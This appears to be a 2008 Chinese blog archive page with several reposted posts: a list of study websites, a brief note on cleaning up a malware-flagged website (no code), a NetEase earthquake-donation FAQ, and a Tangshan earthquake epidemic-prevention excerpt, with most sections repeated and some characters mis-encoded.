互联网是一个广阔的信息海洋,从中找出有价值而且可信的信息对于我们来说是个挑战。如果你知道怎么样从中找到你想要的东西,你将可以节约很多宝贵的时间并且避免让自己犯错。这里有九个网站可以帮助你。无论你需要研究一篇论文,准备考试,或者寻求帮助完成一道作业,这些网站将是最好的的起点。
1.) Google
我想可以很确定的说所有人都知道Google是最好的搜索引擎,随着越来越多的提供丰富内容的站点地出现,我们也更容易且更精确的通过Google获得我们想要的信息。
小提示1:牢记Google重要的操作方法,并且学会怎么样更有效的应用。掌握这些对你迅速找到你搜索的答案很重要。
小提示2:将google工具条加入到你的浏览器工具栏中(或者直接用Firefox)。这将可以帮助你直接从浏览器中使用google搜索,减少你每次使用google时都需要去google首页这一步骤。
2.) Wikipedia 维基百科
不管你的导师怎么样说,我认为Wikipedia非常棒。如果你想要快速大概的了解一个主题,Wikipedia将是你的不二之选。
Wikipedia可以取代一本好的教科书,因为它提供了和教科书一样广泛、深刻的观点。维基百科甚至在有的时候超过了你的教科书。我曾经成功的利用维基百科准备一个300级的心理学考试。
小提示1:在你使用google搜索的时候在关键词后面加上"wiki",它将会把维基百科放在搜索结果的首页。
小提示2: Wikipedia列举了它引用的资源。当你写一个研究论文的时候,除了列举引用Wikipedia页面(许多导师都不允许),还要注明Wikipedia列在底部的引用文章。
3.) Scholarpedia
看起来会感觉像Wikipedia,但是更有学术性的氛围。它上面的主题比维基百科少,但是每一个主题都更深入。
Scholarpedia有一个更严格的发布标准,只允许专家发布。给每一篇文章一个"馆长",并且要求非常仔细的检查。如果你想了解比Wikipedia更多的细节你可以使用这个网站。
4.) Yahoo Answers 雅虎问答
Yahoo Answers是一个普通人都可以在里面提问以及回答问题的社区。有一个关于的历史的问题吗?被数学家庭作业难住了?去Yahoo Answers,问任何你想问的问题。我敢保证你将获得答案,而且速度会很快。
小提示:如果你有家庭作业的难题,进入"Education & Reference"然后选择"Homework Help."。然后一字不漏的写上你的整个问题。我曾经看到人将微积分和三角几何的问题发布在网上,很快就得到了完美的解答。
5.) AllExperts
像雅虎问答,但是有专家参与。它将会花更多的时间来接受回答,但是信息会更有价值含量。
6.) About.com
About.com有数以万计的文章,涉及了数千个主题。它比维基百科要稍微可信一些,因为他们聘请专家为他们写作。
同时,About.com就像一个古老的学校,在1996年的时候就已经开始了,所以它已经有像图像书馆一样好的信息内容。
7.) CliffsNotes
CliffsNotes非常棒!它给了我很多次帮助。CliffsNotes提供学习指导和许多小说的目录。学校课程里面常规性的教材,应该在CliffsNotes都有。
CliffsNotes将帮助你分析一本书的要点,明白它们那些符号的涵义,甚至给你一个非常实用的小检测。它将会给你很大的帮助….你明白,也许你根本就没有真正的看过那本书。
8.) SparkNotes
像Cliff's notes一样,它也很棒。有的时候如果某一个网站上面没有你需要的那本书,你可以交叉着使用这些网站。
9.) How Stuff Works
如果你想明白"how something works,",来这里吧。那些指导不仅仅是机器上的说明书。它会给出详尽的解释包括自然科学理论、政治体系、历史事件等等。
如果你学理论感觉很吃力,需要用我们常规的语言来解释的时候,How Stuff Work将给你很大的帮助。
1.) Google
我想可以很确定的说所有人都知道Google是最好的搜索引擎,随着越来越多的提供丰富内容的站点地出现,我们也更容易且更精确的通过Google获得我们想要的信息。
小提示1:牢记Google重要的操作方法,并且学会怎么样更有效的应用。掌握这些对你迅速找到你搜索的答案很重要。
小提示2:将google工具条加入到你的浏览器工具栏中(或者直接用Firefox)。这将可以帮助你直接从浏览器中使用google搜索,减少你每次使用google时都需要去google首页这一步骤。
2.) Wikipedia 维基百科
不管你的导师怎么样说,我认为Wikipedia非常棒。如果你想要快速大概的了解一个主题,Wikipedia将是你的不二之选。
Wikipedia可以取代一本好的教科书,因为它提供了和教科书一样广泛、深刻的观点。维基百科甚至在有的时候超过了你的教科书。我曾经成功的利用维基百科准备一个300级的心理学考试。
小提示1:在你使用google搜索的时候在关键词后面加上"wiki",它将会把维基百科放在搜索结果的首页。
小提示2: Wikipedia列举了它引用的资源。当你写一个研究论文的时候,除了列举引用Wikipedia页面(许多导师都不允许),还要注明Wikipedia列在底部的引用文章。
3.) Scholarpedia
看起来会感觉像Wikipedia,但是更有学术性的氛围。它上面的主题比维基百科少,但是每一个主题都更深入。
Scholarpedia有一个更严格的发布标准,只允许专家发布。给每一篇文章一个"馆长",并且要求非常仔细的检查。如果你想了解比Wikipedia更多的细节你可以使用这个网站。
4.) Yahoo Answers 雅虎问答
Yahoo Answers是一个普通人都可以在里面提问以及回答问题的社区。有一个关于的历史的问题吗?被数学家庭作业难住了?去Yahoo Answers,问任何你想问的问题。我敢保证你将获得答案,而且速度会很快。
小提示:如果你有家庭作业的难题,进入"Education & Reference"然后选择"Homework Help."。然后一字不漏的写上你的整个问题。我曾经看到人将微积分和三角几何的问题发布在网上,很快就得到了完美的解答。
5.) AllExperts
像雅虎问答,但是有专家参与。它将会花更多的时间来接受回答,但是信息会更有价值含量。
6.) About.com
About.com有数以万计的文章,涉及了数千个主题。它比维基百科要稍微可信一些,因为他们聘请专家为他们写作。
同时,About.com就像一个古老的学校,在1996年的时候就已经开始了,所以它已经有像图像书馆一样好的信息内容。
7.) CliffsNotes
CliffsNotes非常棒!它给了我很多次帮助。CliffsNotes提供学习指导和许多小说的目录。学校课程里面常规性的教材,应该在CliffsNotes都有。
CliffsNotes将帮助你分析一本书的要点,明白它们那些符号的涵义,甚至给你一个非常实用的小检测。它将会给你很大的帮助….你明白,也许你根本就没有真正的看过那本书。
8.) SparkNotes
像Cliff's notes一样,它也很棒。有的时候如果某一个网站上面没有你需要的那本书,你可以交叉着使用这些网站。
9.) How Stuff Works
如果你想明白"how something works,",来这里吧。那些指导不仅仅是机器上的说明书。它会给出详尽的解释包括自然科学理论、政治体系、历史事件等等。
如果你学理论感觉很吃力,需要用我们常规的语言来解释的时候,How Stuff Work将给你很大的帮助。
2008年5月24日星期六
帮一家网站处理挂马
凌晨的时候,帮一家网站处理恶意程序的困扰。
这家网站发现最近访问量下降的厉害,google上面的搜索结果,都出现"This site may harm your computer.",这时才发现,已经被google列为恶意网站了。
恶意网站主要有二大类:一为钓鱼,二为挂马类。后者在最近一段时间占的比例越来越大,据我所知,很多的网站包括一些知名网站都被挂上马了。用户访问的时候,不知不觉就被控制了机器,被窃取了信息。对这些网站来说,一旦上了google的badware黑列表,也非常影响流量,会走失很多可能的新用户。
好歹挂马并不难处理,比较费劲的还是保护服务器系统的后期安全,以防再被挂上马,一再受到这种骚扰,会非常影响业务的持续性,会丢失很多优质客户。可惜我们团队还不被社会认识,没有宣传开,要是哪儿有这类困难,及时联系我吧
这家网站发现最近访问量下降的厉害,google上面的搜索结果,都出现"This site may harm your computer.",这时才发现,已经被google列为恶意网站了。
恶意网站主要有二大类:一为钓鱼,二为挂马类。后者在最近一段时间占的比例越来越大,据我所知,很多的网站包括一些知名网站都被挂上马了。用户访问的时候,不知不觉就被控制了机器,被窃取了信息。对这些网站来说,一旦上了google的badware黑列表,也非常影响流量,会走失很多可能的新用户。
好歹挂马并不难处理,比较费劲的还是保护服务器系统的后期安全,以防再被挂上马,一再受到这种骚扰,会非常影响业务的持续性,会丢失很多优质客户。可惜我们团队还不被社会认识,没有宣传开,要是哪儿有这类困难,及时联系我吧
2008年5月21日星期三
网易网络捐赠平台常见问题说明
网易的说明在这里:
在这里:http://news.163.com/special/00012MVQ/sos01.html
其中涉及到与红十字会中止的原因就在于红十字会不愿公开帐目:"通过网易在线捐赠系统,网易在方便网友捐赠的同时,也可对网友捐款总数有明确记录,起到全程监控作用。而网易合作方"中国红十字总会"则不愿意接受此方式。"
什么时候中止,在此:"经协调,网易于2008年5月14日22时整停止与"中国红十字总会"通过网易在线捐赠平台的合作,同时启动与廖冰兄人文基金管委会合作。"
全文部分如下:
2、网易网络捐赠平台常见问题说明
1.为什么网络支付接收方显示为"汇付天下"?
为使网易网友进行便捷的在线捐赠,网易捐赠页面采用第三方在线支付系统――上海汇付天下网络支付网关。网易网友捐赠资金是通过"汇付天下"系统转至受赠基金会帐号。因此,在网络支付的接收方会显示为"汇付天下"。
2.为什么2008年5月14日22时之前的受赠方变更?
通过网易在线捐赠系统,网易在方便网友捐赠的同时,也可对网友捐款总数有明确记录,起到全程监控作用。而网易合作方"中国红十字总会"则不愿意接受此方式。经协调,网易于2008年5月14日22时整停止与"中国红十字总会"通过网易在线捐赠平台的合作,同时启动与廖冰兄人文基金管委会合作。截至2008年5月14日22时,网易捐赠平台所接受网友捐赠资金将全额转入"中国红十字总会"。2008年5月14日22时起,网易所接受捐赠资金将全额转入廖冰兄人文基金管委会
另,新闻上说现在开始审计捐款了,这是好事,希望不会发生款项挪用。
在这里:http://news.163.com/special/00012MVQ/sos01.html
其中涉及到与红十字会中止的原因就在于红十字会不愿公开帐目:"通过网易在线捐赠系统,网易在方便网友捐赠的同时,也可对网友捐款总数有明确记录,起到全程监控作用。而网易合作方"中国红十字总会"则不愿意接受此方式。"
什么时候中止,在此:"经协调,网易于2008年5月14日22时整停止与"中国红十字总会"通过网易在线捐赠平台的合作,同时启动与廖冰兄人文基金管委会合作。"
全文部分如下:
2、网易网络捐赠平台常见问题说明
1.为什么网络支付接收方显示为"汇付天下"?
为使网易网友进行便捷的在线捐赠,网易捐赠页面采用第三方在线支付系统――上海汇付天下网络支付网关。网易网友捐赠资金是通过"汇付天下"系统转至受赠基金会帐号。因此,在网络支付的接收方会显示为"汇付天下"。
2.为什么2008年5月14日22时之前的受赠方变更?
通过网易在线捐赠系统,网易在方便网友捐赠的同时,也可对网友捐款总数有明确记录,起到全程监控作用。而网易合作方"中国红十字总会"则不愿意接受此方式。经协调,网易于2008年5月14日22时整停止与"中国红十字总会"通过网易在线捐赠平台的合作,同时启动与廖冰兄人文基金管委会合作。截至2008年5月14日22时,网易捐赠平台所接受网友捐赠资金将全额转入"中国红十字总会"。2008年5月14日22时起,网易所接受捐赠资金将全额转入廖冰兄人文基金管委会
另,新闻上说现在开始审计捐款了,这是好事,希望不会发生款项挪用。
推开瘟疫——《唐山大地震》节选
推开瘟疫——《唐山大地震》节选
唐山面临�新的死亡。
几乎从倒塌的楼房埋下第一具尸体开始,与死亡紧紧伴行着的另一恐怖的阴影便已向唐山逼近。
瘟疫!
历史上,"大灾之后必有大疫"已是一条令人惊骇的必然规律。
唐山怎么办?
中国人民解放军北京军区抗震救灾前指后勤组的吉普车,连日在唐山地区奔波。"前指"的帐篷里,所有人的表情都是那样严肃冷峻。他们能够看见,那个妖魔的影子就在眼前晃动。
防疫专家提出了触目惊心的报告:
──城市供电、供水系统中断,道路阻塞,部队和群众不得不喝坑水、沟水、游泳池水,生活于露天之中;
──粪便、垃圾运输和污水排放系统,及城市各项�生设施普遍破坏,造成粪便、污物、垃圾堆积,蚊蝇大量孳生;
──人畜大量伤亡,在气温高、雨量多的情况下,尸体正迅速腐败,尸体腐烂气味严重污染空气和环境;
──唐山市历年是河北省痢疾、肠炎、伤寒、乙脑多发流行区之一。现人员密集,居住拥挤,感染机会较多,传染病人又缺乏隔离条件;
──当地各级卫生机关和群众防病组织遭到严重破坏!
指挥员们比任何人都更清楚那一切意味着什么。据《云南地震考》记载:一九二五年云南大地震,震后人民发生"闭口风"症,患者一半身体变黑,手足收缩,一两个钟头即死。一九四四年,日本进攻印度的军队,在伊木法尔战役中,十万大军中有六万人突然得了疟疾和痢疾,不战自败。一九四九年,解放军南下部队中疟疾和痢疾流行,发病率在有的部队高达百分之八十,部队不得不就地休整。一九五四年,澳洲汤斯维尔爆发"登革热",四十万居民中,有十五万人发病……而现今的唐山可能出现的情形也许比历史上任何一次瘟疫都将更加可怕。几十万人死的死,伤的伤,剩下的几十万灾民和十万救灾部队,完全有可能被瘟疫击垮!
初到唐山的时候,我身上背着背囊、水壶、挎包,包内有上海的好友侯阜晨为我准备的黄连素、六神丸、十滴水、驱蚊剂等各种防病药物,还有两斤大蒜。
瘟疫的阴影已经笼罩着唐山。几天后,当我背着喷雾器出现在废墟上的时候,我更为强烈地感受到了这一点。
如火的骄阳上,弥漫着令人窒息的尸臭。瓦砾上,到处有粪便、垃圾和呕吐物。在各地医疗队所在地那一面面红十字旗前,排�长长的就诊的队伍。皱着眉头、捂�腹部的面如菜色的唐山人,正在等待领取黄连素和痢特灵。仅仅数日,不少病者已被疾病折磨得精疲力尽,有些人坐着,有些人躺着,连挥手驱赶苍蝇的力气都没有。苍蝇到处放肆地追�人叮咬,走到哪里都能听到那"嗡嗡"的噪音。我到民政局长蒋忆潮的"家"去,那芦席小棚简直成了苍蝇的世界,棚顶棚壁黑压压一片,在那�的几个小时,只见他女儿挥动苍蝇拍的手就没有停过。在街上,我看见过一只防蝇的大菜罩,菜罩内躺着一个可爱的婴儿……
所有人都感到了瘟疫的威胁。那些日子里,我天天遵从医嘱用咬碎的蒜擦手,天天服用黄连素,尽管如此,也未能完全摆脱疾病对我的侵袭……
这是一场人类顽强地推开瘟疫的严酷的战役。
当唐山地区各种传染病和发病率日趋上升,已接近爆发程度的时候,中央抗震救灾领导小组正采取紧急对策。据文件记载,当时从全国调集二十一个防疫队,共一千三百人;调来消毒药二百四十吨,杀虫药一百七十六吨,各种喷雾器三万一千多具;调来军用防化消洒车三十一台;调来喷药飞机四架……
"安─2"飞机隆隆的引擎声在空中轰鸣。带有蒜味的马拉硫磷、敌敌畏雨雾般飘落。从早到晚,飞机不停地在八十五平方公里的唐山市区上空盘旋。
地面上,东方红18型机动弥雾机、防化喷洒车、群英式背负喷雾器和圆桶形压缩喷雾器一起开动。
夜晚,废墟上升起一堆堆火,"六六六"的烟雾飘向各个角落……
那些日子,所有被采访的唐山人几乎都证实了一个事实:蚊子似乎见不到了。据北京军区抗震救灾"前指"统计:蚊子的密度下降百分之九十至九十八,而苍蝇的密度只下降了百分之五十。成群的苍蝇仍在肆虐,仍在危及唐山人的生命。牠们从那些散发着臭气的地方飞出来,毒杀一群,又飞出一群;而弥漫着整个城市的臭气仍有增无减。
"冷冻仓库!"救灾部队报告,"震裂了的冷冻仓库�,大量鱼肉正在腐烂!"
"必须彻底清理积压鱼肉!"指挥部的批示很明确。
"铁门变形,无法打开!"救灾部队又一次报告。
"派工兵,爆破!"
惊天动地的爆炸声中,高大的冷冻仓库彻底倒塌了。硝烟未散,人们就已开始抢运出肉食品,变质的立刻掩埋,完好的分给遵众。
然而臭气仍在弥漫。
指挥部所有成员焦虑与复杂的目光,都同时转向了这最主要的也是最后的一个目标。
尸体。二十四万具正在腐烂的尸体。
此刻,在唐山,这项最为险恶、最为繁重的工作,正由无数年轻的军人承担�,艰难地进行�。
灾后初期,所有的埋尸部队都处于无防护状态。士兵们冒着扑鼻的尸臭,赤身露臂挖掘尸体。尸体腐烂,皮肤脱落,他们只能找点破旧布和乱纸垫手。尸体暴露出来的时候,刺激性较强的有毒的硫化氢、氨、甲烷气体混合而成的气味使人晕眩。士兵们只能向尸体上喷洒白酒,或戴上简易的自制纱布口罩,往鼻孔中塞入酒精棉球。
据××军统计,截至八月一日,在救灾的最初三天中,该军共挖出尸体六千五百九十六具,掩埋尸体一万零一百四十八具。
八月一日后,开始有防护用品运到。北京军区司令员陈锡联向所属部队发出指示:"挖掘尸体要注意,因为是夏天,部队要轮流作业,要有防毒面具、防毒手套,要组织好。"
笔者曾看见过北京军区某师对埋尸的士兵做出的几条规定,仅仅从这些规定的字里行间,人们就能够看出年轻的士兵们在经历何种令人震惊的特殊生活:
一是防止尸体腐臭的刺激。工作人员要佩戴防毒口罩;戴普通口罩时,要在口罩或口罩代用品(毛巾、手绢)上涂抹牙膏,喷洒酒精;或者在鼻孔内放入少许大蒜、香菜叶或蘸上酒精、香水的棉球。
二是防止尸液的污染。工作人员必须穿工作服,戴橡皮手套,穿高筒防护靴;在没有防护靴时,可用塑料布将前臂和小腿包扎,以防尸体直接接触皮肤。接触尸体的人员要轮流作业,下班后,要用来苏尔水消毒手,晒衣服。
三是对于尸体处理要做好喷、包、捆、运、埋。
喷药:扒尸与喷药紧密结合。用机动喷雾器、消毒车或直接用脸盆喷洒漂白粉精、漂白粉、来苏尔溶液或酒等。
包裹:先用衣物包头,后用棉被包整个身体,或装入塑料袋扎口。
捆紧:用棉被包尸体后,最少捆三道(头、腰、腿),以免尸臭散发。
运走:要指定专车专人运送,包好后立即运走,避免在市内存放,影响环境。
深埋:尸体深埋地下一点五米至二米,上面加厚土和石灰砸实。
然而这一切并不是所有部队都能做到的,特别是士兵的防护。且不说防护用具决不可能应有尽有,即使有,士兵们又怎么忍心在失去了亲人的唐山人面前,把自己这样那样地保护起来呢?他们只有一个紧迫的念头:快!把遇难者的尸体安葬,抢在瘟疫的前面!
那一幕幕情景,曾是我亲眼目睹也是我终生难忘的。
在唐山市文化路路口的尸体集中点附近,我看见抬尸的士兵从废墟上走下来。尸体用旧棉被包裹里,两端用电线扎紧,吊在一根钢筋上。钢筋勒进了年轻士兵的肩膀。那是两个如此瘦小,还长�孩子似的脸的士兵。他们的军帽歪到了一边,衣袖高高挽起,尸体流出的水一滴滴淌到他们的衣裤上,已经湿了一片。
唐山市第一医院院长老张,流着泪向我诉说他亲眼目睹的情景:"……楼板下那具尸体,好多天了,从边上走过都熏人;两个战士说要钻进去扒,我说不行,要中毒的!等吊车吊开楼板再说……可他们硬是砸开楼板钻了进去。很久很久,递出来一条胳膊,又递出来一条腿……"
某军政委高天正,当时是救灾部队一个师的副政委,他说:"我那儿子,当时才十五岁,就在师�当兵,也是埋尸队的。第一次在废墟上见到他,他还戴着大口罩,第二次见他,口罩没了,手套也没了,人变得又黑又瘦……他说:'爸爸,你放心!我已经习惯了,什么也不怕了!'"
在废墟上,我还访问过一个营教导员。他说:"清理尸体的最初两天,根本没水洗手,战士们从废墟上下来,就用手抓馒头。他们直感到恶心,吃不进饭,一个连队喝不完一锅粥!几天后,一个连队一个连队地生毒疮,全身的毒疮,还淌水……"
那些日子里,每天都能看到一卡车一卡车的尸体向郊外运送。尸体来不及一具具掩埋,许多时候就挖一个大坑,将尸体堆入。在唐山通往丰南的公路边,我亲眼看见过这样的大坑,推土机正在隆隆地吼叫着,把土推入大坑,将它填平。每辆尸车上通常有三个士兵,运尸时,他们头戴防毒面具,坐在驾驶室的顶上。他们排在一起,似乎在相互支撑着那倦极了的身躯。
他们倦极了。当唐山和瘟疫在进行决战的时刻,他们常常通宵达旦地工作。上海医疗队一位女医生曾向我�说她的亲身经历:一天深夜,她起来解手。帐篷四周都是尸体,她踮�脚,小心翼翼地走�,忽然,脚像踩到了一条胳膊。"哎哟",那"尸体"叫了一声,呼地坐起来。女医生吓傻了,好半天她才反应过来,那是一个裹�雨衣、在尸体堆中睡着了的士兵,一个累极了的埋尸队员。当女医生看清那是一张多么年轻稚气的脸时,她的眼泪止不住地淌了下来……
当年我在唐山机场遇到过一支部队。一天早上开饭前,正在整队,一个士兵突然栽倒在地,不省人事。上海医疗队立刻派人赶去抢救,过了一段时间,医生回来说:"……死了。"我已记不清那士兵是因为发什么病而死的了,只记得人们说,他是在连日埋尸的极度疲劳中犯病的。遗憾的是,当时我也没有记下这支部队的番号。事后,我向许多部队的领导打听,他们都说不记得本部队有过死亡的记录。
但唐山会记得这士兵,会记得这一群年轻小伙子的!他们的经历,完全不亚于一次残酷战争的经历;他们的牺牲,完全不亚于血与火之中的牺牲。过了多少年之后,幸存的唐山人一定还会像今天一样对子孙说起,昔日废墟上曾有过几百个、几千个什么样的军人,他们做过什么,他们为的又是什么……
一九七六年入冬后,奉中华人民共和国卫生部的指示,唐山进行了一次"尸体再清理"──将所有掩埋深度不够的尸体重新挖出,或火化,或深埋。这又是一次极其浩大的工程。数万民兵为骨干的清尸队伍,走上废墟,日夜苦干……次年春暖季节,唐山安然度过灾后的传染病爆发期,传染病发病率比常年还低!至此人们可以写下历史性的一笔:震动世界的奇迹──唐山,成功地推开了瘟疫!
唐山面临�新的死亡。
几乎从倒塌的楼房埋下第一具尸体开始,与死亡紧紧伴行着的另一恐怖的阴影便已向唐山逼近。
瘟疫!
历史上,"大灾之后必有大疫"已是一条令人惊骇的必然规律。
唐山怎么办?
中国人民解放军北京军区抗震救灾前指后勤组的吉普车,连日在唐山地区奔波。"前指"的帐篷里,所有人的表情都是那样严肃冷峻。他们能够看见,那个妖魔的影子就在眼前晃动。
防疫专家提出了触目惊心的报告:
──城市供电、供水系统中断,道路阻塞,部队和群众不得不喝坑水、沟水、游泳池水,生活于露天之中;
──粪便、垃圾运输和污水排放系统,及城市各项�生设施普遍破坏,造成粪便、污物、垃圾堆积,蚊蝇大量孳生;
──人畜大量伤亡,在气温高、雨量多的情况下,尸体正迅速腐败,尸体腐烂气味严重污染空气和环境;
──唐山市历年是河北省痢疾、肠炎、伤寒、乙脑多发流行区之一。现人员密集,居住拥挤,感染机会较多,传染病人又缺乏隔离条件;
──当地各级卫生机关和群众防病组织遭到严重破坏!
指挥员们比任何人都更清楚那一切意味着什么。据《云南地震考》记载:一九二五年云南大地震,震后人民发生"闭口风"症,患者一半身体变黑,手足收缩,一两个钟头即死。一九四四年,日本进攻印度的军队,在伊木法尔战役中,十万大军中有六万人突然得了疟疾和痢疾,不战自败。一九四九年,解放军南下部队中疟疾和痢疾流行,发病率在有的部队高达百分之八十,部队不得不就地休整。一九五四年,澳洲汤斯维尔爆发"登革热",四十万居民中,有十五万人发病……而现今的唐山可能出现的情形也许比历史上任何一次瘟疫都将更加可怕。几十万人死的死,伤的伤,剩下的几十万灾民和十万救灾部队,完全有可能被瘟疫击垮!
初到唐山的时候,我身上背着背囊、水壶、挎包,包内有上海的好友侯阜晨为我准备的黄连素、六神丸、十滴水、驱蚊剂等各种防病药物,还有两斤大蒜。
瘟疫的阴影已经笼罩着唐山。几天后,当我背着喷雾器出现在废墟上的时候,我更为强烈地感受到了这一点。
如火的骄阳上,弥漫着令人窒息的尸臭。瓦砾上,到处有粪便、垃圾和呕吐物。在各地医疗队所在地那一面面红十字旗前,排�长长的就诊的队伍。皱着眉头、捂�腹部的面如菜色的唐山人,正在等待领取黄连素和痢特灵。仅仅数日,不少病者已被疾病折磨得精疲力尽,有些人坐着,有些人躺着,连挥手驱赶苍蝇的力气都没有。苍蝇到处放肆地追�人叮咬,走到哪里都能听到那"嗡嗡"的噪音。我到民政局长蒋忆潮的"家"去,那芦席小棚简直成了苍蝇的世界,棚顶棚壁黑压压一片,在那�的几个小时,只见他女儿挥动苍蝇拍的手就没有停过。在街上,我看见过一只防蝇的大菜罩,菜罩内躺着一个可爱的婴儿……
所有人都感到了瘟疫的威胁。那些日子里,我天天遵从医嘱用咬碎的蒜擦手,天天服用黄连素,尽管如此,也未能完全摆脱疾病对我的侵袭……
这是一场人类顽强地推开瘟疫的严酷的战役。
当唐山地区各种传染病和发病率日趋上升,已接近爆发程度的时候,中央抗震救灾领导小组正采取紧急对策。据文件记载,当时从全国调集二十一个防疫队,共一千三百人;调来消毒药二百四十吨,杀虫药一百七十六吨,各种喷雾器三万一千多具;调来军用防化消洒车三十一台;调来喷药飞机四架……
"安─2"飞机隆隆的引擎声在空中轰鸣。带有蒜味的马拉硫磷、敌敌畏雨雾般飘落。从早到晚,飞机不停地在八十五平方公里的唐山市区上空盘旋。
地面上,东方红18型机动弥雾机、防化喷洒车、群英式背负喷雾器和圆桶形压缩喷雾器一起开动。
夜晚,废墟上升起一堆堆火,"六六六"的烟雾飘向各个角落……
那些日子,所有被采访的唐山人几乎都证实了一个事实:蚊子似乎见不到了。据北京军区抗震救灾"前指"统计:蚊子的密度下降百分之九十至九十八,而苍蝇的密度只下降了百分之五十。成群的苍蝇仍在肆虐,仍在危及唐山人的生命。牠们从那些散发着臭气的地方飞出来,毒杀一群,又飞出一群;而弥漫着整个城市的臭气仍有增无减。
"冷冻仓库!"救灾部队报告,"震裂了的冷冻仓库�,大量鱼肉正在腐烂!"
"必须彻底清理积压鱼肉!"指挥部的批示很明确。
"铁门变形,无法打开!"救灾部队又一次报告。
"派工兵,爆破!"
惊天动地的爆炸声中,高大的冷冻仓库彻底倒塌了。硝烟未散,人们就已开始抢运出肉食品,变质的立刻掩埋,完好的分给遵众。
然而臭气仍在弥漫。
指挥部所有成员焦虑与复杂的目光,都同时转向了这最主要的也是最后的一个目标。
尸体。二十四万具正在腐烂的尸体。
此刻,在唐山,这项最为险恶、最为繁重的工作,正由无数年轻的军人承担�,艰难地进行�。
灾后初期,所有的埋尸部队都处于无防护状态。士兵们冒着扑鼻的尸臭,赤身露臂挖掘尸体。尸体腐烂,皮肤脱落,他们只能找点破旧布和乱纸垫手。尸体暴露出来的时候,刺激性较强的有毒的硫化氢、氨、甲烷气体混合而成的气味使人晕眩。士兵们只能向尸体上喷洒白酒,或戴上简易的自制纱布口罩,往鼻孔中塞入酒精棉球。
据××军统计,截至八月一日,在救灾的最初三天中,该军共挖出尸体六千五百九十六具,掩埋尸体一万零一百四十八具。
八月一日后,开始有防护用品运到。北京军区司令员陈锡联向所属部队发出指示:"挖掘尸体要注意,因为是夏天,部队要轮流作业,要有防毒面具、防毒手套,要组织好。"
笔者曾看见过北京军区某师对埋尸的士兵做出的几条规定,仅仅从这些规定的字里行间,人们就能够看出年轻的士兵们在经历何种令人震惊的特殊生活:
一是防止尸体腐臭的刺激。工作人员要佩戴防毒口罩;戴普通口罩时,要在口罩或口罩代用品(毛巾、手绢)上涂抹牙膏,喷洒酒精;或者在鼻孔内放入少许大蒜、香菜叶或蘸上酒精、香水的棉球。
二是防止尸液的污染。工作人员必须穿工作服,戴橡皮手套,穿高筒防护靴;在没有防护靴时,可用塑料布将前臂和小腿包扎,以防尸体直接接触皮肤。接触尸体的人员要轮流作业,下班后,要用来苏尔水消毒手,晒衣服。
三是对于尸体处理要做好喷、包、捆、运、埋。
喷药:扒尸与喷药紧密结合。用机动喷雾器、消毒车或直接用脸盆喷洒漂白粉精、漂白粉、来苏尔溶液或酒等。
包裹:先用衣物包头,后用棉被包整个身体,或装入塑料袋扎口。
捆紧:用棉被包尸体后,最少捆三道(头、腰、腿),以免尸臭散发。
运走:要指定专车专人运送,包好后立即运走,避免在市内存放,影响环境。
深埋:尸体深埋地下一点五米至二米,上面加厚土和石灰砸实。
然而这一切并不是所有部队都能做到的,特别是士兵的防护。且不说防护用具决不可能应有尽有,即使有,士兵们又怎么忍心在失去了亲人的唐山人面前,把自己这样那样地保护起来呢?他们只有一个紧迫的念头:快!把遇难者的尸体安葬,抢在瘟疫的前面!
那一幕幕情景,曾是我亲眼目睹也是我终生难忘的。
在唐山市文化路路口的尸体集中点附近,我看见抬尸的士兵从废墟上走下来。尸体用旧棉被包裹里,两端用电线扎紧,吊在一根钢筋上。钢筋勒进了年轻士兵的肩膀。那是两个如此瘦小,还长�孩子似的脸的士兵。他们的军帽歪到了一边,衣袖高高挽起,尸体流出的水一滴滴淌到他们的衣裤上,已经湿了一片。
唐山市第一医院院长老张,流着泪向我诉说他亲眼目睹的情景:"……楼板下那具尸体,好多天了,从边上走过都熏人;两个战士说要钻进去扒,我说不行,要中毒的!等吊车吊开楼板再说……可他们硬是砸开楼板钻了进去。很久很久,递出来一条胳膊,又递出来一条腿……"
某军政委高天正,当时是救灾部队一个师的副政委,他说:"我那儿子,当时才十五岁,就在师�当兵,也是埋尸队的。第一次在废墟上见到他,他还戴着大口罩,第二次见他,口罩没了,手套也没了,人变得又黑又瘦……他说:'爸爸,你放心!我已经习惯了,什么也不怕了!'"
在废墟上,我还访问过一个营教导员。他说:"清理尸体的最初两天,根本没水洗手,战士们从废墟上下来,就用手抓馒头。他们直感到恶心,吃不进饭,一个连队喝不完一锅粥!几天后,一个连队一个连队地生毒疮,全身的毒疮,还淌水……"
那些日子里,每天都能看到一卡车一卡车的尸体向郊外运送。尸体来不及一具具掩埋,许多时候就挖一个大坑,将尸体堆入。在唐山通往丰南的公路边,我亲眼看见过这样的大坑,推土机正在隆隆地吼叫着,把土推入大坑,将它填平。每辆尸车上通常有三个士兵,运尸时,他们头戴防毒面具,坐在驾驶室的顶上。他们排在一起,似乎在相互支撑着那倦极了的身躯。
他们倦极了。当唐山和瘟疫在进行决战的时刻,他们常常通宵达旦地工作。上海医疗队一位女医生曾向我�说她的亲身经历:一天深夜,她起来解手。帐篷四周都是尸体,她踮�脚,小心翼翼地走�,忽然,脚像踩到了一条胳膊。"哎哟",那"尸体"叫了一声,呼地坐起来。女医生吓傻了,好半天她才反应过来,那是一个裹�雨衣、在尸体堆中睡着了的士兵,一个累极了的埋尸队员。当女医生看清那是一张多么年轻稚气的脸时,她的眼泪止不住地淌了下来……
当年我在唐山机场遇到过一支部队。一天早上开饭前,正在整队,一个士兵突然栽倒在地,不省人事。上海医疗队立刻派人赶去抢救,过了一段时间,医生回来说:"……死了。"我已记不清那士兵是因为发什么病而死的了,只记得人们说,他是在连日埋尸的极度疲劳中犯病的。遗憾的是,当时我也没有记下这支部队的番号。事后,我向许多部队的领导打听,他们都说不记得本部队有过死亡的记录。
但唐山会记得这士兵,会记得这一群年轻小伙子的!他们的经历,完全不亚于一次残酷战争的经历;他们的牺牲,完全不亚于血与火之中的牺牲。过了多少年之后,幸存的唐山人一定还会像今天一样对子孙说起,昔日废墟上曾有过几百个、几千个什么样的军人,他们做过什么,他们为的又是什么……
一九七六年入冬后,奉中华人民共和国卫生部的指示,唐山进行了一次"尸体再清理"──将所有掩埋深度不够的尸体重新挖出,或火化,或深埋。这又是一次极其浩大的工程。数万民兵为骨干的清尸队伍,走上废墟,日夜苦干……次年春暖季节,唐山安然度过灾后的传染病爆发期,传染病发病率比常年还低!至此人们可以写下历史性的一笔:震动世界的奇迹──唐山,成功地推开了瘟疫!
2008年5月20日星期二
交警的忠告
[转帖]常上高速的朋友必看!!!一个高速交警的忠告
这是转载一位高速公路交警的帖子,为我们的生命,请认真读一下!
感谢这位好警察!
